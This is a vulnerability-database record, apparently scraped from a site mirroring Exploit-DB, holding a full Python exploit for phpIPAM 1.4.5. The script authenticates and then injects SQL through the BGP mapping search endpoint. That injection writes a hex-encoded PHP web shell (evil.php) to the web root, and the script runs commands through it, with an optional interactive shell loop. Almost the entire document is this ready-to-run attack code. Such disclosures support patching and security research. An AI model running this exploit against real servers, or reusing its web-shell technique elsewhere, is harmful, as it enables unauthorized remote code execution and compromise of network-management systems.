DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:50963", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)", "description": "", "published": "2022-06-14T00:00:00", "modified": "2022-06-14T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/50963", "reporter": "Guilherme Alves", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2023-12-03T20:48:20", "viewCount": 270, "enchantments": {"score": {"value": 7.4, "uncertanity": 1.9, "vector": "NONE"}, "vulnersScore": 7.4}, "_state": {"score": 1701637053, "dependencies": 1701637463, "epss": 0}, "_internal": {"score_hash": "e0655adf7e11bb3be3bab6a95cd72f23"}, "sourceHref": "https://www.exploit-db.com/raw/50963", "sourceData": "# Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)\r\n# Date: 2022-04-10\r\n# Exploit Author: Guilherme '@behiNdyk1' Alves\r\n# Vendor Homepage: https://phpipam.net/\r\n# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5\r\n# Version: 1.4.5\r\n# Tested on: Linux Ubuntu 20.04.3 LTS\r\n\r\n#!/usr/bin/env python3\r\n\r\nimport requests\r\nimport argparse\r\nfrom sys import exit, argv\r\nfrom termcolor import colored\r\n\r\nbanner = \"\"\"\r\n\u2588\u2580\u2588 \u2588\u2591\u2588 \u2588\u2580\u2588 \u2588 \u2588\u2580\u2588 \u2584\u2580\u2588 \u2588\u2580\u2584\u2580\u2588 \u2584\u2588 \u2591 \u2588\u2591\u2588 \u2591 \u2588\u2580 \u2588\u2580 \u2588\u2580\u2588 \u2588\u2591\u2591 \u2588 \u2580\u2588\u2580 \u2588\u2580\u2588 \u2588\u2580\u2588 \u2588\u2580\u2580 \u2588\u2580\u2580\r\n\u2588\u2580\u2580 \u2588\u2580\u2588 \u2588\u2580\u2580 \u2588 \u2588\u2580\u2580 \u2588\u2580\u2588 \u2588\u2591\u2580\u2591\u2588 \u2591\u2588 \u2584 \u2580\u2580\u2588 \u2584 \u2584\u2588 \u2584\u2588 \u2580\u2580\u2588 \u2588\u2584\u2584 \u2588 \u2591\u2588\u2591 \u2588\u2584\u2588 \u2588\u2580\u2584 \u2588\u2584\u2584 \u2588\u2588\u2584\r\n\r\n\u2588\u2584\u2584 \u2588\u2584\u2588 \u2588\u2584\u2584 \u2588\u2580\u2580 \u2588\u2591\u2588 \u2588 \u2588\u2584\u2591\u2588 \u2588\u2580\u2584 \u2588\u2584\u2588 \u2588\u2580 \u2588\u2580\u2580 \u2588\u2580\u2580\r\n\u2588\u2584\u2588 \u2591\u2588\u2591 \u2588\u2584\u2588 \u2588\u2588\u2584 \u2588\u2580\u2588 \u2588 \u2588\u2591\u2580\u2588 \u2588\u2584\u2580 \u2591\u2588\u2591 \u2584\u2588 \u2588\u2588\u2584 \u2588\u2584\u2584\\n\"\"\"\r\nprint(banner)\r\n\r\nparser = argparse.ArgumentParser(usage=\"./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell\", description=\"phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE\")\r\n\r\nparser.add_argument(\"-url\", type=str, help=\"URL to vulnerable IPAM\", required=True)\r\nparser.add_argument(\"-usr\", type=str, help=\"Username to log in as\", required=True)\r\nparser.add_argument(\"-pwd\", type=str, help=\"User's password\", required=True)\r\nparser.add_argument(\"-cmd\", type=str, help=\"Command to execute\", default=\"id\")\r\nparser.add_argument(\"--path\", type=str, help=\"Path to writable system folder and accessible via webserver (default: /var/www/html)\", default=\"/var/www/html\")\r\nparser.add_argument(\"--shell\", type=str, help=\"Spawn a shell (non-interactive)\", nargs=\"?\")\r\nargs = parser.parse_args()\r\n\r\nurl = args.url\r\nusername = args.usr\r\npassword = args.pwd\r\ncommand = args.cmd\r\npath = args.path\r\n\r\n# Validating url\r\nif url.endswith(\"/\"):\r\n\turl = url[:-1]\r\nif not url.startswith(\"http://\") and not url.startswith(\"https://\"):\r\n\tprint(colored(\"[!] Please specify a valid scheme (http:// or https://) before the domain.\", \"yellow\"))\r\n\texit()\r\n\r\ndef login(url, username, password):\r\n\t\"\"\"Takes an username and a password and tries to execute a login (IPAM)\"\"\"\r\n\tdata = {\r\n\t\"ipamusername\": username,\r\n\t\"ipampassword\": password\r\n\t}\r\n\tprint(colored(f\"[...] Trying to log in as {username}\", \"blue\"))\r\n\tr = requests.post(f\"{url}/app/login/login_check.php\", data=data)\r\n\tif \"Invalid username or password\" in r.text:\r\n\t\tprint(colored(f\"[-] There's an error when trying to log in using these credentials --> {username}:{password}\", \"red\"))\r\n\t\texit()\r\n\telse:\r\n\t\tprint(colored(\"[+] Login successful!\", \"green\"))\r\n\t\treturn str(r.cookies['phpipam'])\r\n\r\nauth_cookie = login(url, username, password)\r\n\r\ndef exploit(url, auth_cookie, path, command):\r\n\tprint(colored(\"[...] Exploiting\", \"blue\"))\r\n\tvulnerable_path = \"app/admin/routing/edit-bgp-mapping-search.php\"\r\n\tdata = {\r\n\t\"subnet\": f\"\\\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -\",\r\n\t\"bgp_id\": \"1\"\r\n\t}\r\n\tcookies = {\r\n\t\"phpipam\": auth_cookie\r\n\t}\r\n\trequests.post(f\"{url}/{vulnerable_path}\", data=data, cookies=cookies)\r\n\ttest = requests.get(f\"{url}/evil.php\")\r\n\tif test.status_code != 200:\r\n\t\treturn print(colored(f\"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1\", \"red\"))\r\n\tif \"--shell\" in argv:\r\n\t\twhile True:\r\n\t\t\tcommand = input(\"Shell> \")\r\n\t\t\tr = requests.get(f\"{url}/evil.php?cmd={command}\")\r\n\t\t\tprint(r.text)\r\n\telse:\r\n\t\tprint(colored(f\"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd\", \"green\"))\r\n\t\tr = requests.get(f\"{url}/evil.php?cmd={command}\")\r\n\t\tprint(f\"\\n\\n[+] Output:\\n{r.text}\")\r\n\r\nexploit(url, auth_cookie, path, command)", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{}